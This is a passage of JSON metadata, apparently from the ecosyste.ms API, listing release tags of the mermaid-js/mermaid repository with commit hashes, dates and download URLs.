.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms